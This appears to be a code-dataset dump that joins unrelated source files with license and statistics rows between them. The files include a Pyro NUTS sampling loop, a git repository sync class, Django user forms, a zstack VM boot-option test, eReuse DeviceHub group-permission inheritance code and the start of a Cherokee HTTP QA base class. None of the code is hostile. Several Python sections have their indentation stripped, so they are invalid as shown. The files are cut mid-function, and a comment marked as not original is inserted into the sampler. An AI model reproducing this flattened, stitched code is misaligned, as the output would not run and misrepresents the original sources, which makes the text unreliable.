                else: # go to the left, start from the left leaf of current tree
new_tree = self._build_tree(z_left, r_left, z_left_grads, log_slice,
direction, tree_depth, energy_current)
z_left = new_tree.z_left
r_left = new_tree.r_left
r_left_unscaled = new_tree.r_left_unscaled
z_left_grads = new_tree.z_left_grads
sum_accept_probs = sum_accept_probs + new_tree.sum_accept_probs
num_proposals = num_proposals + new_tree.num_proposals
# stop doubling
if new_tree.diverging:
if self._t >= self._warmup_steps:
self._divergences.append(self._t - self._warmup_steps)
break
if new_tree.turning:
break
tree_depth += 1
if self.use_multinomial_sampling:
new_tree_prob = (new_tree.weight - tree_weight).exp()
else:
new_tree_prob = new_tree.weight / tree_weight
rand = pyro.sample("rand_t={}_treedepth={}".format(self._t, tree_depth),
dist.Uniform(scalar_like(new_tree_prob, 0.),
scalar_like(new_tree_prob, 1.)))
if rand < new_tree_prob:
accepted = True
z = new_tree.z_proposal
z_grads = new_tree.z_proposal_grads
self._cache(z, new_tree.z_proposal_pe, z_grads)
r_sum = {site_names: r_sum[site_names] + new_tree.r_sum[site_names]
for site_names in r_unscaled}
if self._is_turning(r_left_unscaled, r_right_unscaled, r_sum): # stop doubling
break
else: # update tree_weight
if self.use_multinomial_sampling:
tree_weight = _logaddexp(tree_weight, new_tree.weight)
else:
tree_weight = tree_weight + new_tree.weight
accept_prob = sum_accept_probs / num_proposals
self._t += 1
if self._t > self._warmup_steps:
n = self._t - self._warmup_steps
if accepted:
self._accept_cnt += 1
else:
n = self._t
self._adapter.step(self._t, z, accept_prob, z_grads)
self._mean_accept_prob += (accept_prob.item() - self._mean_accept_prob) / n
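        # Added note (not in the original source): this is the standard incremental
        # mean update, mean_n = mean_{n-1} + (x_n - mean_{n-1}) / n; since n restarts
        # at 1 after warmup, the reported statistic averages post-warmup steps only.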
return z.copy()
| apache-2.0 | -5,235,973,262,115,647,000 | 50.082324 | 112 | 0.592122 | false |
CommitAnalyzingService/CAS_Reader | localrepository.py | 1 | 2688 | """
file: localrepository.py
author: Ben Grawi <[email protected]>
date: October 2013
description: Holds the repository abstraction class
"""
from git import *
from commit import *
from datetime import datetime
import os
import logging
class LocalRepository():
"""
Repository():
description: Abstracts the actions done on a repository
"""
repo = None
adapter = None
start_date = None
def __init__(self, repo):
"""
__init__(path): String -> NoneType
description: Abstracts the actions done on a repository
"""
self.repo = repo
# Temporary until other Repo types are added
self.adapter = Git
self.commits = {}
def sync(self):
"""
sync():
description: Simply wraps the syncing functions together
"""
# TODO: Error checking.
firstSync = self.syncRepoFiles()
self.syncCommits(firstSync)
# Set the date AFTER it has been ingested and synced.
self.repo.ingestion_date = self.start_date
def syncRepoFiles(self):
"""
syncRepoFiles() -> Boolean
description: Downloads the current repo locally, and sets the path and
                     ingestion date accordingly
returns: Boolean - if this is the first sync
"""
# Cache the start date to set later
self.start_date = str(datetime.now().replace(microsecond=0))
path = os.path.dirname(__file__) + self.adapter.REPO_DIRECTORY + self.repo.id
        # See if repo has already been downloaded; if it is, fetch; if not, clone
if os.path.isdir(path):
self.adapter.fetch(self.adapter, self.repo)
firstSync = False
else:
self.adapter.clone(self.adapter, self.repo)
firstSync = True
return firstSync
def syncCommits(self, firstSync):
"""
syncCommits():
description: Makes each commit dictonary into an object and then
inserts them into the database
arguments: firstSync Boolean: whether to sync all commits or after the
ingestion date
"""
commits = self.adapter.log(self.adapter, self.repo, firstSync)
commitsSession = Session()
logging.info('Saving commits to the database...')
for commitDict in commits:
commitDict['repository_id'] = self.repo.id
commitsSession.merge(Commit(commitDict))
commitsSession.commit()
logging.info('Done saving commits to the database.') | gpl-2.0 | -2,973,074,924,643,994,000 | 31.209877 | 85 | 0.585193 | false |
zbyufei/fabric-bolt | src/fabric_bolt/accounts/forms.py | 17 | 6324 | import string
import random
from django import forms
from django.contrib.auth import get_user_model
from django.contrib.auth.models import Group
from django.contrib.auth.forms import PasswordChangeForm, SetPasswordForm
from django.utils.timezone import now
from django.utils.translation import ugettext_lazy as _
from crispy_forms.helper import FormHelper
from crispy_forms.layout import Layout, Fieldset, Submit, Field, HTML, Div
from crispy_forms.bootstrap import FormActions
class LoginForm(forms.Form):
"""
Super simple login form
"""
email = forms.CharField()
password = forms.CharField(widget=forms.PasswordInput)
# Form Layout
helper = FormHelper()
helper.form_class = 'form-horizontal'
helper.label_class = 'col-md-4'
helper.field_class = 'col-md-8'
helper.layout = Layout(
Fieldset(
'Please Login',
Field('email', placeholder='[email protected]'),
Field('password', placeholder='123456'),
),
FormActions(
Submit('login', 'Login', css_class="button pull-right"),
#HTML('<br/><a href="{% url \'password_reset\' %}">Recover Password</a>'),
)
)
class UserChangeForm(forms.ModelForm):
"""
A form for updating users.
"""
user_level = forms.ChoiceField(choices=Group.objects.all().values_list(), label='User Level')
is_active = forms.ChoiceField(choices=((True, 'Active'), (False, 'Disabled')), label='Status')
# Form Layout
helper = FormHelper()
helper.form_class = 'form-horizontal'
helper.label_class = 'col-md-4'
helper.field_class = 'col-md-8'
helper.layout = Layout(
Field('email'),
Field('first_name'),
Field('last_name'),
Field('user_level'),
Field('is_active'),
Field('template'),
FormActions(
Submit('btnSubmit', 'Submit', css_class="button btn-primary pull-right"),
),
)
class Meta:
model = get_user_model()
def __init__(self, *args, **kwargs):
# form instance and initial values
initial = kwargs.get('initial', {})
instance = kwargs.get('instance', {})
user_is_admin = kwargs.pop('user_is_admin', False)
# Set initial values for the non-model questions
if instance:
# Get user's group
groups = instance.groups.all()
initial['user_level'] = groups[0].id if groups.exists() else None
# Map is_active question to model property
initial['is_active'] = instance.is_active
kwargs['initial'] = initial
super(UserChangeForm, self).__init__(*args, **kwargs)
self.fields['password'].required = False
self.fields['last_login'].required = False
self.fields['date_joined'].required = False
self.fields['template'].required = False
if not user_is_admin:
self.fields.pop('user_level', None)
self.fields.pop('is_active', None)
f = self.fields.get('user_permissions', None)
if f is not None:
f.queryset = f.queryset.select_related('content_type')
    # Keep the hidden inputs at their initial values since we don't want them tampered with
def clean_password(self):
return self.initial["password"]
def clean_last_login(self):
return self.initial["last_login"]
def clean_date_joined(self):
return self.initial["date_joined"]
def save(self, commit=True):
"""
Save the model instance with the correct Auth Group based on the user_level question
"""
instance = super(UserChangeForm, self).save(commit=commit)
if commit:
instance.save()
# Assign user to selected group
if self.cleaned_data.get('user_level', False):
instance.groups.clear()
instance.groups.add(Group.objects.get(id=self.cleaned_data['user_level']))
# Set staff status based on user group
instance.is_staff = instance.user_is_admin()
instance.save()
return instance
class UserCreationForm(UserChangeForm):
"""
    A form for creating new users. Includes all the required fields and
    generates a random initial password for the user.
"""
error_messages = {'duplicate_email': _("A user with that email already exists."), }
class Meta:
model = get_user_model()
def clean_date_joined(self):
return now()
def clean_last_login(self):
return now()
def clean_email(self):
"""
Set a nicer error message than the ORM.
"""
email = self.cleaned_data["email"]
try:
get_user_model()._default_manager.get(email=email)
except get_user_model().DoesNotExist:
return email
raise forms.ValidationError(self.error_messages['duplicate_email'])
def clean_password(self):
"""
Generate a random 32 char password for this user
"""
return ''.join(random.choice(string.ascii_uppercase + string.digits) for x in range(32))
def save(self, commit=True):
"""
Save the model instance with the correct Auth Group based on the user_level question
"""
instance = super(UserCreationForm, self).save(commit=commit)
instance.set_password(self.cleaned_data['password'])
instance.save()
return instance
class UserPasswordChangeForm(PasswordChangeForm):
# Form Layout
helper = FormHelper()
helper.form_class = 'form-horizontal'
helper.label_class = 'col-md-4'
helper.field_class = 'col-md-8'
helper.layout = Layout(
Field('old_password'),
Field('new_password1'),
Field('new_password2'),
FormActions(
Submit('btnSubmit', 'Submit', css_class="button btn-primary pull-right"),
),
)
class UserPasswordCreateForm(SetPasswordForm):
# Form Layout
helper = FormHelper()
helper.form_class = 'form-horizontal'
helper.label_class = 'col-md-4'
helper.field_class = 'col-md-8'
helper.layout = Layout(
Field('new_password1'),
Field('new_password2'),
FormActions(
Submit('btnSubmit', 'Submit', css_class="button btn-primary pull-right"),
),
) | mit | 5,131,589,913,344,467,000 | 29.408654 | 98 | 0.612587 | false |
zstackorg/zstack-woodpecker | integrationtest/vm/basic/test_vm_with_volumes_boot_option.py | 1 | 2167 | '''
New integration test for testing the boot options of a VM with 2 additional data volumes.
@author: ChenyuanXu
'''
import zstackwoodpecker.test_util as test_util
import zstackwoodpecker.test_lib as test_lib
import zstackwoodpecker.test_state as test_state
import zstacklib.utils.shell as shell
import zstackwoodpecker.operations.config_operations as conf_ops
import test_stub
import time
import os
from vncdotool import api
test_stub = test_lib.lib_get_test_stub()
test_obj_dict = test_state.TestStateDict()
node_ip = os.environ.get('node1Ip')
boot_option_picture = "/home/%s/zstack-woodpecker/vm_volumes_boot.png" % node_ip
def test():
global test_obj_dict
global vm
import signal
def handler(signum, frame):
raise Exception()
signal.signal(signal.SIGALRM, handler)
signal.alarm(30)
test_util.test_dsc('Create test vm with 2 additional data volumes boot option')
conf_ops.change_global_config('vm', 'bootMenu', 'false')
disk_offering = test_lib.lib_get_disk_offering_by_name(os.environ.get('smallDiskOfferingName'))
disk_offering_uuids = [disk_offering.uuid]
disk_offering = test_lib.lib_get_disk_offering_by_name(os.environ.get('rootDiskOfferingName'))
disk_offering_uuids.append(disk_offering.uuid)
vm = test_stub.create_vm_with_volume(data_volume_uuids = disk_offering_uuids)
test_obj_dict.add_vm(vm)
vm_inv = vm.get_vm()
vm_ip = vm_inv.vmNics[0].ip
console = test_lib.lib_get_vm_console_address(vm.get_vm().uuid)
test_util.test_logger('[vm:] %s console is on %s:%s' % (vm.get_vm().uuid, console.hostIp, console.port))
display = str(int(console.port)-5900)
client = api.connect(console.hostIp+":"+display)
time.sleep(2)
client.keyPress('esc')
try:
client.expectRegion(boot_option_picture,0,100)
except:
test_util.test_logger('Success to not enable boot menu.')
else:
test_util.test_fail('Fail to not enable boot menu.')
vm.destroy()
test_util.test_pass('VM With Volumes Boot Option Test Success')
#Will be called only if exception happens in test().
def error_cleanup():
global vm
if vm:
vm.destroy()
| apache-2.0 | -4,675,907,969,492,191,000 | 32.859375 | 108 | 0.704661 | false |
eReuse/DeviceHub | ereuse_devicehub/resources/group/domain.py | 1 | 26205 | from collections import Iterable
from typing import Dict, List, Set, Type
from bson import ObjectId
from ereuse_utils.naming import Naming
from passlib.utils import classproperty
from pydash import compact, difference, difference_with, flatten, map_values, pick, pluck, py_, \
union_by
from pymongo.errors import OperationFailure
from ereuse_devicehub.resources.account.domain import AccountDomain
from ereuse_devicehub.resources.device.component.domain import ComponentDomain
from ereuse_devicehub.resources.device.domain import DeviceDomain
from ereuse_devicehub.resources.device.schema import Device
from ereuse_devicehub.resources.domain import Domain, ResourceNotFound
from ereuse_devicehub.resources.event.device import DeviceEventDomain
from ereuse_devicehub.resources.group.settings import Group, GroupSettings
Perms = List[Dict[str, str]]
# noinspection PyProtectedMember
class GroupDomain(Domain):
"""
Manages group-device-event inheritance with permissions.
- Use ``update_children()`` to create
"""
resource_settings = GroupSettings
@classmethod
def update_children(cls, original: dict, updated: dict, ancestors: list, _id: str or None, perms: Perms):
"""
Updates the children of a group to reflect what says in the ``original`` field, materializing and affecting
other resources and their permissions.
:param original: The original *children* field.
:param updated: The new *children* field.
:param ancestors: The *ancestors* field.
:param _id: The id of the group.
:param perms: The *perms* field.
"""
# todo there is no control (only in client) to prevent "shared parenting"
        # todo (resources can only have 1 parent, except when their parent is lots)
        # todo allow groups other than lots to "share" children (one child - multiple lots)
for resource_name in cls.children_resources.keys():
resource_original = set(original.get(resource_name, []))
resource_updated = set(updated.get(resource_name, []))
new_orphans = resource_original - resource_updated
new_adopted = resource_updated - resource_original
if new_orphans or new_adopted:
child_domain = cls.children_resources[resource_name]
# We remove our foreign key (with our ancestors) in the orphans' documents
parent_accounts = py_(perms).pluck('account').uniq().value()
cls.disinherit(_id, child_domain, new_orphans, parent_accounts)
# We remove other parents (some groups may override it and do nothing here)
# Inherit, executed after, will propagate this changes to the descendants
cls.remove_other_parents_of_type(_id, child_domain, new_adopted)
# We add our foreign key (with our ancestors) in the new adopted's documents
# and we propagate all changes to our descendants
cls.inherit(_id, ancestors, child_domain, new_adopted, perms)
@classmethod
def disinherit(cls, parent_id: str, child_domain: Type[Domain], children: Set[str], parent_accounts: List[str]):
"""
Removes the *ancestors* dict the children inherited from the parent, and then recursively updates
the ancestors of the descendants of the children.
:param parent_id: The id of the parent, used as FK.
:param child_domain: The domain of the children. Note that this forces all children to be of the same @type.
Call inherit as many times as types of children you have.
:param children: A list of children ids.
"""
q = {'$pull': {'ancestors': {'@type': cls.resource_settings._schema.type_name, '_id': parent_id}}}
full_children = child_domain.update_raw_get(children, q)
cls._remove_perms(full_children, parent_accounts, child_domain)
# We disinherit any component the devices have (only devices have components)
components = compact(flatten(pluck(full_children, 'components')))
if components:
cls.disinherit(parent_id, ComponentDomain, set(components), parent_accounts)
# Inherit children groups
if issubclass(child_domain, GroupDomain):
cls._update_inheritance_grandchildren(full_children, child_domain, accounts_to_remove=parent_accounts)
@classmethod
def remove_other_parents_of_type(cls, new_parent_id: str, child_domain: Type[Domain],
children: Set[str]):
"""
Removes any parent of the same type of the parent children have.
By default a resource can only have one parent of a type, so we remove another parent of the same
type that our children have. Some groups like lots of packages *share parenthood* (they allow
multiple parents simultaniously for their children) and they override this method with a *pass*.
This method does not recursively update descendants –use **inherit() after**.
:param child_domain: The domain of the children. Note that this forces all children to be of the same @type.
Call inherit as many times as types of children you have.
:param children: A list of children ids.
"""
query = {'$pull': {'ancestors': {'@type': cls.resource_settings._schema.type_name}}}
child_domain.update_raw(children, query)
# Remove child ids from all parents of the given type
child_rname = child_domain.resource_settings.resource_name()
cls.update_many_raw({'_id': {'$ne': new_parent_id}},
{'$pullAll': {'children.{}'.format(child_rname): children}})
@classmethod
def inherit(cls, parent_id: str, parent_ancestors: list, child_domain: Type[Domain], children: Set[str],
parent_perms: Perms = None, accounts_to_remove: List[str] = None):
"""
Copies all the ancestors of the parent to the children (adding the parent as an ancestor), adding the
*parents_perms* to the children xor removing accounts. Then, recursively it calls itself to update the
descendants of the children.
Note that inherit is called too when **dis**inheriting, because this method will transmit the result of
the "disinheritance" to the descendants. This is why this method supports *accounts_to_remove* property.
Certain kind of groups behave differently here and they override this method.
:param parent_id: The id of the parent, used as FK.
:param parent_ancestors: An *ancestor dict*, see the Group Schema for more info.
:param child_domain: The domain of the children. Note that this forces all children to be of the same @type.
Call inherit as many times as types of children you have.
:param children: A list of children id.
"""
# Inheritance mechanism:
# - If parent is place, inherit all its places.
# - ancestors.prepend({'@type': 'Place', 'name': '', 'places': [_id]})
# - If parent is lot:
# - If child is lot, inherit places and lots
# - ancestors.prepend({'@type': 'Lot', 'name': '', 'places': [_id], 'lots': [_id]})
# - If child is package or device, inherit only lots
# - ancestors.prepend({'@type': 'Lot', 'name': '', 'lots': [_id]})
# - If parent is package (then child can only be package or device) inherit everything:
# - ancestors.prepend({'@type': 'Lot', 'name': '', 'lots': [_id], 'packages': [_id], 'places': [_id]})
        # As places only have places, this is the same as inheriting everything they have.
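        # Illustrative example (added; not in the original source): a device whose
        # direct parent is package P, with P itself inside lot L, ends up with an
        # ancestors entry roughly like
        #   {'@type': 'Package', '_id': P, 'lots': {L}, 'packages': set(), 'places': set()}
        # i.e. one dict per direct parent whose per-group sets accumulate the
        # grandparents, so descendants can be found without walking the whole tree.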
groups = cls.children_resources.keys()
full_children = cls._inherit(groups, parent_id, parent_ancestors, child_domain, children, parent_perms,
accounts_to_remove)
if issubclass(child_domain, GroupDomain):
cls._update_inheritance_grandchildren(full_children, child_domain, parent_perms, accounts_to_remove)
@classmethod
def _inherit(cls, groups_to_inherit: Iterable, parent_id: str, parent_ancestors: list, child_domain: Type[Domain],
resources: Set[str], parent_perms: Perms = None, accounts_to_remove: List[str] = None) -> list:
"""
Copies the passed-in ancestors to the resources with the new permissions xor accounts to remove.
This method specifically computes the *ancestors* property for each children and then calls to _update_db
to update their value.
Ancestors are merged in a set, avoiding repetition of ancestors for resources with multiple parents. When
pasting the copy, it tries to identify an existing ancestors dictionary given by the parent,
otherwise creates a new one.
"""
# update_db needs 2 queries:
# ancestors is a query that will be used when creating a relationship resource - parent
# (the resource has a new parent)
ancestors = {'@type': cls.resource_settings._schema.type_name, '_id': parent_id}
# update_query is used to replace the ancestors of my parent
update_query = {'$set': {}}
for resource_name in groups_to_inherit:
ancestors[resource_name] = set() # We want to explicitly 'set' for the db
# for all the parents of my parent
for grandparent in parent_ancestors:
if resource_name in grandparent:
ancestors[resource_name] |= set(grandparent[resource_name])
if grandparent['@type'] == Naming.type(resource_name): # We add the grandparent itself
ancestors[resource_name].add(grandparent['_id'])
# Let's copy the result of the iteration to the update query
update_query['$set']['ancestors.$.' + resource_name] = ancestors[resource_name]
# ADDING PERMISSIONS
# ------------------
# Note that adding permissions is an easy query so we can do it here,
# removing permissions is more difficult and is done inside _remove_perms(), executed inside of
# _update_db
if parent_perms:
# inherit is executed after an ancestor moved to another one
# in this case we override the perms of the descendants
# todo if inherit is produced because a resource was **added** (not moved) to another lot
# todo we are loosing the perms of the first lot, this should only be happening when moving
# todo and not copying
update_query['$set']['perms'] = parent_perms
return cls._update_db(parent_id, resources, ancestors, update_query, child_domain,
parent_perms, accounts_to_remove)
@classmethod
def _update_db(cls, parent_id: str, resources: Set[str], ancestors_new: dict, update_query: dict,
child_domain: Type[Domain], parent_perms: Perms = None,
parent_accounts_remove: List[str] = None) -> List[dict]:
"""
Executes in database for the passed-in resources and, for devices, their components too:
- The query (the passed-in *ancestors_update*) computed in *_inherit*. This query
updates *ancestors* and **adds** permissions.
- Removes permissions when passing in *parent_acounts_remove* (internally calling *_remove_perms*)
- For devices, adds and removes permissions for accounts when necessary (internally calling *_remove_perms*)
"""
new_children = []
for resource in resources: # We cannot run all the resources at once when catching exceptions
try:
# Let's try to update an existing ancestor dict (this is with the same _id and @type),
# Note that this only will succeed when a relationship child-parent already exists, and this happens
                # when we are updating the grandchildren (and so on) after adding/deleting a relationship
eq = {'ancestors.@type': ancestors_new['@type'], 'ancestors._id': parent_id}
full_child, *_ = child_domain.update_raw_get(resource, update_query, extra_query=eq, upsert=True)
except OperationFailure as e:
if e.code == 16836:
# There is not an ancestor dict, so let's create one
# This only happens when creating a relationship parent-child
new_query = {
'$push': {'ancestors': {'$each': [ancestors_new], '$position': 0}},
}
if parent_perms is not None:
# ADDING PERMISSIONS (bis)
# ------------------------
new_query['$set'] = {'perms': parent_perms}
full_child, *_ = child_domain.update_raw_get(resource, new_query)
else:
raise e
new_children.append(full_child)
# UPDATE COMPONENTS
# -----------------
# Components of devices inherit exactly the same way as their parents, so
# let's re-call this method with the components
components = full_child.get('components', []) # Let's update the components
if components:
cls._update_db(parent_id, components, ancestors_new, update_query, ComponentDomain, parent_perms,
parent_accounts_remove)
# REMOVING PERMISSIONS
# --------------------
# Update perms for all children
# Note that we took profit of the update above to add permissions
if parent_accounts_remove:
# We are inheriting the removal of permissions
cls._remove_perms(new_children, parent_accounts_remove, child_domain)
# ADDING PERMISSIONS TO EVENTS
# ----------------------------
if parent_perms:
events_id = py_(new_children).pluck('events').flatten().pluck('_id').value()
cls.add_perms_to_events(events_id, parent_perms)
return new_children
@classmethod
def _update_inheritance_grandchildren(cls, full_children: list, child_domain: Type['GroupDomain'],
parent_perms: Perms = None, accounts_to_remove: List[str] = None):
"""
Moves forward in updating the inheritance for the descendants by calling inherit, passing the
child as the parent and the grand-children as children.
As *inherit* calls this method, recursively they update the ancestors of all descendants.
:param full_children: The children whose children (our grand-children) will be updated
:param child_domain: The domain of the children. Note that this forces all children to be the same @type.
"""
if child_domain.resource_settings.resource_name() in Group.resource_names:
for full_child in full_children:
for name in child_domain.children_resources.keys():
grandchildren_domain = child_domain.children_resources[name]
grandchildren = set(full_child['children'][name]) if name in full_child['children'] else set()
if grandchildren:
child_domain.inherit(full_child['_id'], full_child['ancestors'], grandchildren_domain,
grandchildren, parent_perms, accounts_to_remove)
@classproperty
def children_resources(cls) -> Dict[str, Type[Domain]]:
"""Dict containing the ResourceDomain of each type of children a group can have."""
if not hasattr(cls, '_children_resources'):
from ereuse_devicehub.resources.group.physical.place.domain import PlaceDomain
from ereuse_devicehub.resources.group.physical.package.domain import PackageDomain
from ereuse_devicehub.resources.group.physical.pallet.domain import PalletDomain
from ereuse_devicehub.resources.group.abstract.lot.domain import LotDomain
from ereuse_devicehub.resources.group.abstract.lot.incoming_lot.domain import IncomingLotDomain
from ereuse_devicehub.resources.group.abstract.lot.outgoing_lot.domain import OutgoingLotDomain
children_resources = {
PlaceDomain.resource_settings.resource_name(): PlaceDomain,
PackageDomain.resource_settings.resource_name(): PackageDomain,
DeviceDomain.resource_settings.resource_name(): DeviceDomain,
LotDomain.resource_settings.resource_name(): LotDomain,
IncomingLotDomain.resource_settings.resource_name(): IncomingLotDomain,
OutgoingLotDomain.resource_settings.resource_name(): OutgoingLotDomain,
ComponentDomain.resource_settings.resource_name(): ComponentDomain,
PalletDomain.resource_settings.resource_name(): PalletDomain
}
types = {DeviceDomain.resource_settings.resource_name(), ComponentDomain.resource_settings.resource_name()}
types |= cls.resource_settings._schema.resource_names
cls._children_resources = pick(children_resources, *types)
return cls._children_resources
@classmethod
def is_parent(cls, parent_type: str, parent_id: str, child_id: str) -> bool:
q = {'_id': child_id, 'ancestors': {'$elemMatch': {'@type': parent_type, '_id': parent_id}}}
try:
return bool(cls.get_one(q))
except ResourceNotFound:
return False
@classmethod
def get_descendants(cls, child_domain: Type[Domain], parent_ids: str or list) -> list:
"""
Get the descendants of this class type of the given ancestor.
:param child_domain: The child domain.
:param parent_ids: The id of a parent or a list of them. We retrieve descendants of **any** parent.
"""
# The following is possible because during the inheritance, we only add to 'ancestors' the valid ones.
type_name = cls.resource_settings._schema.type_name
ids = parent_ids if type(parent_ids) is list else [parent_ids]
query = {
'$or': [
{'ancestors': {'$elemMatch': {'@type': type_name, '_id': {'$in': ids}}}},
{'ancestors': {'$elemMatch': {cls.resource_settings.resource_name(): {'$elemMatch': {'$in': ids}}}}}
]
}
return child_domain.get(query)
@classmethod
def get_all_descendants(cls, parent_ids: str or list) -> list:
# Todo enhance by performing only one query
return map_values(cls.children_resources, lambda domain: cls.get_descendants(domain, parent_ids))
@classmethod
def _remove_perms(cls, resources: List[dict], accounts: List[str], child_domain: Type[Domain]):
"""
Remove the permissions of the passed-in accounts from the resources.
We drop the perm for those accounts that don't have explicit access.
:param resources: Resources to remove permissions from.
:param accounts: The accounts to remove, if don't have explicit access.
:param child_domain: The child domain.
"""
# Remove permissions
for resource in resources:
# Compute which accounts we remove
accounts_to_remove = difference(accounts, resource.get('sharedWith', []))
# Get the perms referencing those accounts
perms = difference_with(resource['perms'], accounts_to_remove, comparator=lambda a, b: a['account'] == b)
if len(perms) != len(resource['perms']):
# We have lost some permissions
child_domain.update_one_raw(resource['_id'], {'$set': {'perms': perms}})
resource['perms'] = perms # As we pass it into another function, just in case it is used later
if resource['@type'] in Device.types:
# For devices, we need to update their events too
cls._remove_perms_in_event(accounts_to_remove, resource['_id'])
@classmethod
def _remove_perms_in_event(cls, accounts_to_remove_from_device: List[ObjectId], device_id: str):
"""
Removes the permissions for the passed-in accounts, which the device is loosing, from the events.
The accounts loose their permission only if, apart from the passed-in device (where the accounts are lost),
the accounts don't have permissions on the other devices.
:param accounts_to_remove_from_device: The accounts that we want to remove.
:param device_id: The device that is dropping access for the accounts.
:param events_id: The affected events.
"""
from ereuse_devicehub.resources.event.device import DeviceEventDomain
for event in DeviceEventDomain.get_devices_components_id([device_id]):
# Which accounts have access to any of the other devices?
# Those accounts with access will be saved, as it means the user can access the event because this
# event represents a device that the account can access to.
# Accounts that don't have access to other devices mean that they only had access to the
# device we are removing, so we will drop access to the account as well.
devices_id = DeviceEventDomain.devices_id(event, DeviceEventDomain.DEVICES_ID_COMPONENTS)
devices_id.remove(device_id)
devices = DeviceDomain.get_in('_id', devices_id)
accounts_to_remove_from_event = difference(accounts_to_remove_from_device,
py_(devices).pluck('perms').flatten().pluck('account').value())
if accounts_to_remove_from_event:
cls._remove_perms([event], accounts_to_remove_from_event, DeviceEventDomain)
@classmethod
def update_and_inherit_perms(cls, resource_id: dict, resource_type: str, label: str, shared_with: Set[ObjectId],
old_perms: List[dict], new_perms: List[dict]):
"""
Update the sharedWith of the resource and inherits the **changed** (and only the changed) permissions to its
descendants.
sharedWith is updated for both the resource and its descendants, if needed; this updates the account too.
        Be aware that the cost of this method greatly increases with the number of descendants.
:raise UserHasExplicitDbPerms: You can't share to accounts that already have full access to this database.
"""
if old_perms != new_perms:
# Add new explicit shares to the *sharedWith* list and materialize it in the affected accounts
accounts_to_add = set(pluck(new_perms, 'account')) - set(pluck(old_perms, 'account'))
shared_with |= accounts_to_add
# This can raise an exception and thus need to be executed before any modification in the DB
AccountDomain.add_shared(accounts_to_add, resource_type, AccountDomain.requested_database, resource_id,
label)
# We compute which permissions we need to set (or re-set because they changed)
accounts_to_remove = set(pluck(old_perms, 'account')) - set(pluck(new_perms, 'account'))
shared_with = cls.remove_shared_with(resource_type, resource_id, shared_with, accounts_to_remove)
# Inherit
new_modified_perms = difference(new_perms, old_perms) # New or modified permissions to write to descendants
for resource_name, domain in cls.children_resources.items():
for descendant in cls.get_descendants(domain, resource_id):
# Remove permissions
f = lambda a, b: a['account'] == b
perms = difference_with(descendant['perms'], list(accounts_to_remove), comparator=f)
# Set or re-set new or updated permissions
perms = union_by(new_modified_perms, perms, iteratee=lambda x: x['account'])
q = {'$set': {'perms': perms}}
if resource_name not in Device.resource_names:
# Remove accounts that lost permission from sharedWith
descendant_shared_with = set(descendant.get('sharedWith', set()))
descendant_shared_with = cls.remove_shared_with(descendant['@type'], descendant['_id'],
descendant_shared_with, accounts_to_remove)
q['$set']['sharedWith'] = descendant_shared_with
else:
# For devices, remove the perms from the events
cls._remove_perms_in_event(list(accounts_to_remove), descendant['_id'])
# add new perms to events
events_id = pluck(descendant['events'], '_id')
cls.add_perms_to_events(events_id, perms)
# Update the changes of the descendant in the database
domain.update_one_raw(descendant['_id'], q)
return shared_with
@classmethod
def remove_shared_with(cls, type_name: str, _id: str or ObjectId, shared_with: Set[ObjectId],
accounts_to_remove: Set[ObjectId]) -> Set[ObjectId]:
"""Removes the shared accounts, updating the accounts database. Returns the new sharedWith."""
db = AccountDomain.requested_database
AccountDomain.remove_shared(db, shared_with.intersection(accounts_to_remove), _id, type_name)
return set(shared_with) - accounts_to_remove
@staticmethod
def add_perms_to_events(events_id: List[str], perms: List[dict]):
"""Adds the perms to the events."""
for event in DeviceEventDomain.get_in('_id', events_id):
_perms = union_by(event['perms'], perms, iteratee=lambda x: x['account'])
DeviceEventDomain.update_one_raw(event['_id'], {'$set': {'perms': _perms}})
class GroupNotFound(ResourceNotFound):
pass
| agpl-3.0 | -4,580,337,173,036,685,000 | 56.462719 | 120 | 0.629584 | false |
chetan/cherokee | qa/base.py | 2 | 12534 | # -*- coding: utf-8 -*-
# Cherokee QA Tests
#
# Authors:
# Alvaro Lopez Ortega <[email protected]>
#
# Copyright (C) 2001-2010 Alvaro Lopez Ortega
# This file is distributed under the GPL license.
import os
import imp
import sys
import types
import socket
import errno
import string
import tempfile
from conf import *
from util import *
DEFAULT_READ = 8192
def importfile(path):
filename = os.path.basename(path)
name, ext = os.path.splitext(filename)
file = open(path, 'r')
module = imp.load_module(name, file, path, (ext, 'r', imp.PY_SOURCE))
file.close()
return module
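# Illustrative usage (added; the file and class names are assumptions, not from
# this module): the QA runner loads each test script as a module and instantiates
# the test class it defines, e.g.
#   mod = importfile('001-basic.py')
#   test = mod.Test() # a TestBase subclass defined by the test script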
class TestBase:
def __init__ (self, file):
self.file = file # 001-basic.py
self.name = None # Test 01: Basic functionality
self.conf = None # Directory /test { .. }
self.request = "" # GET / HTTP/1.0
self.proxy_suitable = True
self.post = None
self.expected_error = None
self.expected_content = None
self.forbidden_content = None
self.disabled = False
self._initialize()
def _initialize (self):
self.ssl = None
self.reply = "" # "200 OK"..
self.version = None # HTTP/x.y: 9, 0 or 1
self.reply_err = None # 200
def _safe_read (self, s):
while True:
try:
if self.ssl:
return self.ssl.read (DEFAULT_READ)
else:
return s.recv (DEFAULT_READ)
except socket.error, (err, strerr):
if err == errno.EAGAIN or \
err == errno.EWOULDBLOCK or \
err == errno.EINPROGRESS:
continue
raise
def _do_request (self, host, port, ssl):
for res in socket.getaddrinfo (host, port, socket.AF_UNSPEC, socket.SOCK_STREAM):
af, socktype, proto, canonname, sa = res
try:
s = socket.socket(af, socktype, proto)
except socket.error, msg:
continue
try:
s.connect(sa)
except socket.error, msg:
s.close()
s = None
continue
break
if s is None:
raise Exception("Couldn't connect to the server")
if ssl:
try:
self.ssl = socket.ssl (s)
except:
raise Exception("Couldn't handshake SSL")
request = self.request + "\r\n"
if self.post is not None:
request += self.post
if self.ssl:
n = self.ssl.write (request)
else:
n = s.send (request)
assert (n == len(request))
while True:
try:
d = self._safe_read (s)
except Exception, e:
d = ''
if not len(d):
break
self.reply += d
s.close()
def _parse_output (self):
if not len(self.reply):
raise Exception("Empty header")
# Protocol version
reply = self.reply.split('\r', 1)[0]
if reply[:8] == "HTTP/0.9":
self.version = 9
elif reply[:8] == "HTTP/1.0":
self.version = 0
elif reply[:8] == "HTTP/1.1":
self.version = 1
else:
raise Exception("Invalid header, len=%d: '%s'" % (len(reply), reply))
# Error code
reply = reply[9:]
try:
self.reply_err = int (reply[:3])
except:
raise Exception("Invalid header, version=%d len=%d: '%s'" % (self.version, len(reply), reply))
def _check_result_expected_item (self, item):
if item.startswith("file:"):
f = open (item[5:])
error = not f.read() in self.reply
            f.close()
if error:
return -1
else:
if not item in self.reply:
return -1
def _check_result_forbidden_item (self, item):
if item.startswith("file:"):
f = open (item[5:])
error = f.read() in self.reply
            f.close()
